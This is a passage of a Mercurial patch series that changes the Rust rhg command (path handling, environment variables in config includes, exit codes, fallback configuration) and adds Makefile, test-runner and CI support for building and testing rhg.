a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -40,13 +40,15 @@ let repo = invocation.repo?; let cwd = hg::utils::current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute let mut files = vec![]; for file in file_args.iter() { // TODO: actually normalize `..` path segments etc? let normalized = cwd.join(&file); let stripped = normalized - .strip_prefix(&repo.working_directory_path()) + .strip_prefix(&working_directory) // TODO: error message for path arguments outside of the repo .map_err(|_| CommandError::abort(""))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -4,6 +4,7 @@ use hg::operations::list_rev_tracked_files; use hg::operations::Dirstate; use hg::repo::Repo; +use hg::utils::current_dir; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -53,8 +54,10 @@ files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); + let working_directory = repo.working_directory_path(); + let working_directory = current_dir()?.join(working_directory); // Make it absolute let working_directory = - HgPathBuf::from(get_bytes_from_path(repo.working_directory_path())); + HgPathBuf::from(get_bytes_from_path(working_directory)); let mut stdout = ui.stdout_buffer(); diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use format_bytes::format_bytes; +use hg::errors::{IoErrorContext, IoResultExt}; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -14,7 +15,12 @@ pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { let repo = invocation.repo?; - let bytes = get_bytes_from_path(repo.working_directory_path()); + let working_directory = repo.working_directory_path(); + let working_directory = std::fs::canonicalize(working_directory) + .with_context(|| { + IoErrorContext::CanonicalizingPath(working_directory.to_owned()) + })?; + let bytes = get_bytes_from_path(&working_directory); invocation .ui .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615190148 -3600 # Mon Mar 08 08:55:48 2021 +0100 # Node ID 25e3dac511f066fd1991458b3be1e8bfe7c0f42c # Parent 97ac588b6d9e146feb133b9588078d19a606dcdf rhg: Add support for the HGRCSKIPREPO environment variable It’s easy enough and affects tests, well, that test that feature. Differential Revision: https://phab.mercurial-scm.org/D10139 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -24,6 +24,7 @@ /// Holds the config values for the current repository /// TODO update this docstring once we support more sources +#[derive(Clone)] pub struct Config { layers: Vec<layer::ConfigLayer>, } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -169,7 +169,11 @@ reqs.extend(requirements::load(Vfs { base: &store_path })?); } - let repo_config = config.combine_with_repo(&repo_config_files)?; + let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() { + config.combine_with_repo(&repo_config_files)? + } else { + config.clone() + }; let repo = Self { requirements: reqs, # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615214132 -3600 # Mon Mar 08 15:35:32 2021 +0100 # Node ID 91ab5190a3deaab1c1532d937eba9fc41361923c # Parent 25e3dac511f066fd1991458b3be1e8bfe7c0f42c rhg: Add support for environment variables in config include paths Some tests rely on this. Differential Revision: https://phab.mercurial-scm.org/D10140 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -150,6 +150,7 @@ let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; + let filename_bytes = crate::utils::expand_vars(filename_bytes); // `Path::parent` only fails for the root directory, // which `src` can’t be since we’ve managed to open it as a // file. diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -241,6 +241,59 @@ }) } +/// Expand `$FOO` and `${FOO}` environment variables in the given byte string +pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> { + lazy_static::lazy_static! { + /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301 + /// The `x` makes whitespace ignored. + /// `-u` disables the Unicode flag, which makes `\w` like Python with the ASCII flag. + static ref VAR_RE: regex::bytes::Regex = + regex::bytes::Regex::new(r"(?x-u) + \$ + (?: + (\w+) + | + \{ + ([^}]*) + \} + ) + ").unwrap(); + } + VAR_RE.replace_all(s, |captures: ®ex::bytes::Captures| { + let var_name = files::get_os_str_from_bytes( + captures + .get(1) + .or_else(|| captures.get(2)) + .expect("either side of `|` must participate in match") + .as_bytes(), + ); + std::env::var_os(var_name) + .map(files::get_bytes_from_os_str) + .unwrap_or_else(|| { + // Referencing an environment variable that does not exist. + // Leave the $FOO reference as-is. + captures[0].to_owned() + }) + }) +} + +#[test] +fn test_expand_vars() { + // Modifying process-global state in a test isn’t great, + // but hopefully this won’t collide with anything. + std::env::set_var("TEST_EXPAND_VAR", "1"); + assert_eq!( + expand_vars(b"before/$TEST_EXPAND_VAR/after"), + &b"before/1/after"[..] + ); + assert_eq!( + expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"), + &b"before111after"[..] + ); + let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after"; + assert_eq!(expand_vars(s), &s[..]); +} + pub(crate) enum MergeResult<V> { UseLeftValue, UseRightValue, diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -23,7 +23,7 @@ use std::ops::Deref; use std::path::{Path, PathBuf}; -pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { +pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr { let os_str; #[cfg(unix)] { @@ -33,8 +33,11 @@ // TODO Handle other platforms // TODO: convert from WTF8 to Windows MBCS (ANSI encoding). // Perhaps, the return type would have to be Result<PathBuf>. + os_str +} - Path::new(os_str) +pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { + Path::new(get_os_str_from_bytes(bytes)) } // TODO: need to convert from WTF8 to MBCS bytes on Windows. # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615226849 -3600 # Mon Mar 08 19:07:29 2021 +0100 # Node ID 84a3deca963a727919d84ca3c1acfa675eecd7d1 # Parent 91ab5190a3deaab1c1532d937eba9fc41361923c rhg: Silently ignore missing files in config %include … instead of aborting with an error message. This is what Python-based hg does. Differential Revision: https://phab.mercurial-scm.org/D10141 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -160,20 +160,28 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = std::fs::read(&filename).map_err(|io_error| { - ConfigParseError { - origin: ConfigOrigin::File(src.to_owned()), - line, - message: format_bytes!( - b"cannot include {} ({})", - filename_bytes, - format_bytes::Utf8(io_error) - ), + match std::fs::read(&filename) { + Ok(data) => { + layers.push(current_layer); + layers.extend(Self::parse(&filename, &data)?); + current_layer = + Self::new(ConfigOrigin::File(src.to_owned())); } - })?; - layers.push(current_layer); - layers.extend(Self::parse(&filename, &data)?); - current_layer = Self::new(ConfigOrigin::File(src.to_owned())); + Err(error) => { + if error.kind() != std::io::ErrorKind::NotFound { + return Err(ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(error) + ), + } + .into()); + } + } + } } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = SECTION_RE.captures(&bytes) { section = m[1].to_vec(); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614786003 -3600 # Wed Mar 03 16:40:03 2021 +0100 # Node ID b1f2c2b336ec792d3e7eff18e059e9c850ddca03 # Parent 84a3deca963a727919d84ca3c1acfa675eecd7d1 rhg: `cat` command: print error messages for missing files And exit with an error code if no file was matched. This matches the behavior of Python-based hg. Differential Revision: https://phab.mercurial-scm.org/D10142 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -17,30 +17,49 @@ use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; +pub struct CatOutput { + /// Whether any file in the manifest matched the paths given as CLI + /// arguments + pub found_any: bool, + /// The contents of matching files, in manifest order + pub concatenated: Vec<u8>, + /// Which of the CLI arguments did not match any manifest file + pub missing: Vec<HgPathBuf>, + /// The node ID that the given revset was resolved to + pub node: Node, +} + const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// List files under Mercurial control at a given revision. +/// Output the given revision of files /// /// * `root`: Repository root /// * `rev`: The revision to cat the files from. /// * `files`: The files to output. -pub fn cat( +pub fn cat<'a>( repo: &Repo, revset: &str, - files: &[HgPathBuf], -) -> Result<Vec<u8>, RevlogError> { + files: &'a [HgPathBuf], +) -> Result<CatOutput, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; + let node = *changelog + .node_from_rev(rev) + .expect("should succeed when changelog.get_rev did"); let manifest_node = Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; + let mut matched = vec![false; files.len()]; + let mut found_any = false; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { - for cat_file in files.iter() { + for (cat_file, is_matched) in files.iter().zip(&mut matched) { if cat_file.as_bytes() == manifest_file.as_bytes() { + *is_matched = true; + found_any = true; let index_path = store_path(manifest_file, b".i"); let data_path = store_path(manifest_file, b".d"); @@ -65,7 +84,18 @@ } } - Ok(bytes) + let missing: Vec<_> = files + .iter() + .zip(&matched) + .filter(|pair| !*pair.1) + .map(|pair| pair.0.clone()) + .collect(); + Ok(CatOutput { + found_any, + concatenated: bytes, + missing, + node, + }) } fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf { diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -6,7 +6,7 @@ mod debugdata; mod dirstate_status; mod list_tracked_files; -pub use cat::cat; +pub use cat::{cat, CatOutput}; pub use debugdata::{debug_data, DebugDataKind}; pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,8 +1,8 @@ use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; use crate::revlog::Revision; +use crate::revlog::{Node, NodePrefix}; /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { @@ -34,6 +34,10 @@ let bytes = self.revlog.get_rev_data(rev)?; Ok(ChangelogEntry { bytes }) } + + pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> { + Some(self.revlog.index.get_entry(rev)?.hash()) + } } /// `Changelog` entry which knows how to interpret the `changelog` data bytes. diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -31,6 +31,9 @@ /// see also `NODES_BYTES_LENGTH` about it being private. const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH; +/// Default for UI presentation +const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12; + /// Private alias for readability and to ease future change type NodeData = [u8; NODE_BYTES_LENGTH]; @@ -164,6 +167,13 @@ pub fn as_bytes(&self) -> &[u8] { &self.data } + + pub fn short(&self) -> NodePrefix { + NodePrefix { + nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH, + data: self.data, + } + } } /// The beginning of a binary revision SHA. diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -49,7 +49,7 @@ /// When index and data are not interleaved: bytes of the revlog index. /// When index and data are interleaved: bytes of the revlog index and /// data. - index: Index, + pub(crate) index: Index, /// When index and data are not interleaved: bytes of the revlog data data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>, /// When present on disk: the persistent nodemap for this revlog diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use clap::Arg; +use format_bytes::format_bytes; use hg::operations::cat; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -58,9 +59,23 @@ match rev { Some(rev) => { - let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - invocation.ui.write_stdout(&data)?; - Ok(()) + let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + invocation.ui.write_stdout(&output.concatenated)?; + if !output.missing.is_empty() { + let short = format!("{:x}", output.node.short()).into_bytes(); + for path in &output.missing { + invocation.ui.write_stderr(&format_bytes!( + b"{}: no such file in rev {}\n", + path.as_bytes(), + short + ))?; + } + } + if output.found_any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } None => Err(CommandError::unsupported( "`rhg cat` without `--rev` / `-r`", diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -15,6 +15,9 @@ /// Exit with an error message and "standard" failure exit code. Abort { message: Vec<u8> }, + /// Exit with a failure exit code but no message. + Unsuccessful, + /// Encountered something (such as a CLI argument, repository layout, …) /// not supported by this version of `rhg`. Depending on configuration /// `rhg` may attempt to silently fall back to Python-based `hg`, which diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,8 @@ /// Generic abort pub const ABORT: ExitCode = 255; +/// Generic something completed but did not succeed +pub const UNSUCCESSFUL: ExitCode = 1; + /// Command or feature not implemented by rhg pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -186,6 +186,7 @@ match result { Ok(()) => exitcode::OK, Err(CommandError::Abort { .. }) => exitcode::ABORT, + Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. @@ -242,6 +243,7 @@ } match &result { Ok(_) => {} + Err(CommandError::Unsuccessful) => {} Err(CommandError::Abort { message }) => { if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615227933 -3600 # Mon Mar 08 19:25:33 2021 +0100 # Node ID 63bfcddddac1d6f361ca012e31a6005793c714c6 # Parent b1f2c2b336ec792d3e7eff18e059e9c850ddca03 rhg: Exit with an error code if `files` finds nothing This matches the behavior of Python-based hg. Differential Revision: https://phab.mercurial-scm.org/D10143 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -61,11 +61,17 @@ let mut stdout = ui.stdout_buffer(); + let mut any = false; for file in files { + any = true; let file = working_directory.join(file); stdout.write_all(relativize_path(&file, &cwd).as_ref())?; stdout.write_all(b"\n")?; } stdout.flush()?; - Ok(()) + if any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615230260 -3600 # Mon Mar 08 20:04:20 2021 +0100 # Node ID eb14264b98e8dcdc3bd259a5aa5fa3cd934d46e7 # Parent 63bfcddddac1d6f361ca012e31a6005793c714c6 rhg: Fall back to Python for --version Clap has some built-in support for printing something on --version, but it looks different than what Pytho-based hg does. Also, at the moment we’re not giving version numbers to rhg separate from the Mercurial version. Differential Revision: https://phab.mercurial-scm.org/D10144 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -29,6 +29,7 @@ let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::DisableVersion) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .arg( # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615277844 -3600 # Tue Mar 09 09:17:24 2021 +0100 # Node ID b1e6265e8336563bb3f4fdb77a82b5b6dd61679b # Parent eb14264b98e8dcdc3bd259a5aa5fa3cd934d46e7 rhg: Return an error code for `rhg config Section.idontexist` This is what Python-based hg does. Differential Revision: https://phab.mercurial-scm.org/D10145 diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -29,8 +29,10 @@ .split_2(b'.') .ok_or_else(|| HgError::unsupported("hg config <section>"))?; - let value = invocation.config.get(section, name).unwrap_or(b""); - - invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; - Ok(()) + if let Some(value) = invocation.config.get(section, name) { + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615581847 -3600 # Fri Mar 12 21:44:07 2021 +0100 # Node ID bde90e9b4507a96916d50772d3bf1aec3121c1fd # Parent b1e6265e8336563bb3f4fdb77a82b5b6dd61679b rhg: Remove `rhg.fallback-executable=hg` default configuration When `rhg.on-unsupported` is configured to `fallback` and an unsupported feature is encountered, the previous default was to look for an `hg` executable in `$PATH`. This default was fragile since it was easy to end up accidentally using an older version of Mercurial installed system-wide, when a local (perhaps patched) installation was intended. Instead, it is now an error to have `rhg.on-unsupported=fallback` without also configuring an explicit path or the fallback executable. Differential Revision: https://phab.mercurial-scm.org/D10189 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -138,7 +138,7 @@ exit( &initial_current_dir, &ui, - OnUnsupported::from_config(&non_repo_config), + OnUnsupported::from_config(&ui, &non_repo_config), Err(CommandError::UnsupportedFeature { message: format_bytes!( b"URL-like --repository {}", @@ -158,7 +158,7 @@ Err(error) => exit( &initial_current_dir, &ui, - OnUnsupported::from_config(&non_repo_config), + OnUnsupported::from_config(&ui, &non_repo_config), Err(error.into()), ), }; @@ -168,6 +168,7 @@ } else { &non_repo_config }; + let on_unsupported = OnUnsupported::from_config(&ui, config); let result = main_with_result( &process_start_time, @@ -175,12 +176,7 @@ repo_result.as_ref(), config, ); - exit( - &initial_current_dir, - &ui, - OnUnsupported::from_config(config), - result, - ) + exit(&initial_current_dir, &ui, on_unsupported, result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -242,6 +238,14 @@ } } } + exit_no_fallback(ui, on_unsupported, result) +} + +fn exit_no_fallback( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, +) -> ! { match &result { Ok(_) => {} Err(CommandError::Unsuccessful) => {} @@ -387,9 +391,8 @@ impl OnUnsupported { const DEFAULT: Self = OnUnsupported::Abort; - const DEFAULT_FALLBACK_EXECUTABLE: &'static [u8] = b"hg"; - fn from_config(config: &Config) -> Self { + fn from_config(ui: &Ui, config: &Config) -> Self { match config .get(b"rhg", b"on-unsupported") .map(|value| value.to_ascii_lowercase()) @@ -400,7 +403,16 @@ Some(b"fallback") => OnUnsupported::Fallback { executable: config .get(b"rhg", b"fallback-executable") - .unwrap_or(Self::DEFAULT_FALLBACK_EXECUTABLE) + .unwrap_or_else(|| { + exit_no_fallback( + ui, + Self::Abort, + Err(CommandError::abort( + "abort: 'rhg.on-unsupported=fallback' without \ + 'rhg.fallback-executable' set." + )), + ) + }) .to_owned(), }, None => Self::DEFAULT, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -150,6 +150,14 @@ $ rhg cat original original content + $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE" + $ unset RHG_FALLBACK_EXECUTABLE + $ rhg cat original + abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set. + [255] + $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE" + $ export RHG_FALLBACK_EXECUTABLE + $ rhg cat original --config rhg.fallback-executable=false [1] # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615586696 -3600 # Fri Mar 12 23:04:56 2021 +0100 # Node ID 5a2212d403980bee71e7f2b0d4784099ca7c2f82 # Parent bde90e9b4507a96916d50772d3bf1aec3121c1fd tests: Disable for rhg remaining tests that fail in that mode These cases are in features not yet implemented by rhg for which triggering a fallback is not practical. Disabling some tests allows us to reach passing CI and catch any future regression in the rest of the tests. Differential Revision: https://phab.mercurial-scm.org/D10190 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -3,6 +3,8 @@ Invalid syntax: no value +TODO: add rhg support for detailed exit codes +#if no-rhg $ cat > .hg/hgrc << EOF > novaluekey > EOF @@ -35,6 +37,7 @@ $ hg showconfig config error at $TESTTMP/.hg/hgrc:1: unexpected leading whitespace: [section] [30] +#endif Reset hgrc diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -531,9 +531,17 @@ Test WdirUnsupported exception +#if no-rhg $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff abort: working directory revision cannot be specified [255] +#else +TODO: add rhg support for (at least parsing) the working directory pseudo-changeset + $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff + abort: working directory revision cannot be specified (missing-correct-output !) + abort: invalid revision identifier: ffffffffffffffffffffffffffffffffffffffff (known-bad-output !) + [255] +#endif Test cache warming command diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -90,9 +90,12 @@ $ mkdir -p badrepo/.hg $ echo 'invalid-syntax' > badrepo/.hg/hgrc +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg log -b -Rbadrepo default config error at badrepo/.hg/hgrc:1: invalid-syntax [30] +#endif $ hg log -b --cwd=inexistent default abort: $ENOENT$: 'inexistent' diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -65,6 +65,8 @@ -R with path aliases: +TODO: add rhg support for path aliases +#if no-rhg $ cd c $ hg -R default identify 8580ff50825a tip @@ -75,6 +77,7 @@ $ HOME=`pwd`/../ hg -R relativetohome identify 8580ff50825a tip $ cd .. +#endif #if no-outer-repo @@ -215,6 +218,8 @@ $ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo quuxfoo +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg --cwd c --config '' tip -q abort: malformed --config option: '' (use --config section.name=value) [10] @@ -230,6 +235,7 @@ $ hg --cwd c --config .b= tip -q abort: malformed --config option: '.b=' (use --config section.name=value) [10] +#endif Testing --debug: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380811 -3600 # Wed Mar 10 13:53:31 2021 +0100 # Node ID 350e7f051e954f3092afb0d31a680c7674b44efa # Parent 5a2212d403980bee71e7f2b0d4784099ca7c2f82 makefile: add a build-chg option This is done as a gratuitous improvement on the way to add makefile entry to build and install rhg. It seems saner to have equivalent entry for chg too. Differential Revision: https://phab.mercurial-scm.org/D10191 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -68,6 +68,9 @@ build: $(PYTHON) setup.py $(PURE) build $(COMPILERFLAG) +build-chg: + make -C contrib/chg + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380827 -3600 # Wed Mar 10 13:53:47 2021 +0100 # Node ID a7204958ca21e8ee5bc63bd2445e04f7c84065f8 # Parent 350e7f051e954f3092afb0d31a680c7674b44efa makefile: add a install-chg option This is done as a gratuitous improvement on the way to add makefile entry to build and install rhg. It seems saner to have equivalent entry for chg too. Differential Revision: https://phab.mercurial-scm.org/D10192 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -99,6 +99,9 @@ install-bin: build $(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force +install-chg: build-chg + make -C contrib/chg install PREFIX="$(PREFIX)" + install-doc: doc cd doc && $(MAKE) $(MFLAGS) install # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380840 -3600 # Wed Mar 10 13:54:00 2021 +0100 # Node ID a20674f2055c2a84f97e5302415e84a6382b8871 # Parent a7204958ca21e8ee5bc63bd2445e04f7c84065f8 makefile: add a build-rhg option This gives an easy action to build the rhg-binary. This will be useful for the `install-rhg` action in the next changeset. Differential Revision: https://phab.mercurial-scm.org/D10193 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -71,6 +71,9 @@ build-chg: make -C contrib/chg +build-rhg: + (cd rust/rhg; cargo build --release) + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380853 -3600 # Wed Mar 10 13:54:13 2021 +0100 # Node ID 99c0b03894ee470aaf2e718fad1d42a5003a9282 # Parent a20674f2055c2a84f97e5302415e84a6382b8871 makefile: add a install option This gives and easy way to install rhg that we can use in `run-test.py` in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D10194 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -116,6 +116,9 @@ install-home-doc: doc cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install +install-rhg: build-rhg + install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/ + MANIFEST-doc: $(MAKE) -C doc MANIFEST # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380886 -3600 # Wed Mar 10 13:54:46 2021 +0100 # Node ID 9ba00a9dc6eaa6518d45f483e95c9c269e205441 # Parent 99c0b03894ee470aaf2e718fad1d42a5003a9282 run-test: install rhg if --rhg is passed Before this, --rhg was only working with --local. Differential Revision: https://phab.mercurial-scm.org/D10195 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -3389,6 +3389,9 @@ if self.options.chg: assert self._installdir self._installchg() + if self.options.rhg: + assert self._installdir + self._installrhg() log( 'running %d tests using %d parallel processes' @@ -3750,6 +3753,33 @@ sys.stdout.write(out) sys.exit(1) + def _installrhg(self): + """Install rhg into the test environment""" + vlog('# Performing temporary installation of rhg') + assert os.path.dirname(self._bindir) == self._installdir + assert self._hgroot, 'must be called after _installhg()' + cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % { + b'make': b'make', # TODO: switch by option or environment? + b'prefix': self._installdir, + } + cwd = self._hgroot + vlog("# Running", cmd) + proc = subprocess.Popen( + cmd, + shell=True, + cwd=cwd, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + out, _err = proc.communicate() + if proc.returncode != 0: + if PYTHON3: + sys.stdout.buffer.write(out) + else: + sys.stdout.write(out) + sys.exit(1) + def _outputcoverage(self): """Produce code coverage output.""" import coverage # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615233891 -3600 # Mon Mar 08 21:04:51 2021 +0100 # Node ID 6b57144792881bb9cda37d43c59d2b8001177981 # Parent 9ba00a9dc6eaa6518d45f483e95c9c269e205441 ci: Add a job testing with rhg installed as `hg` This significantly increases test coverage of rhg, without duplicating many tests that already exist. The `cargo build` command being remove only compiled a `rhg` executable (as shown by the preceding `cd` command) but since a previous patch `run-tests.py --rhg` now takes care of that. Differential Revision: https://phab.mercurial-scm.org/D10196 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -26,17 +26,6 @@ - echo "$RUNTEST_ARGS" - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" 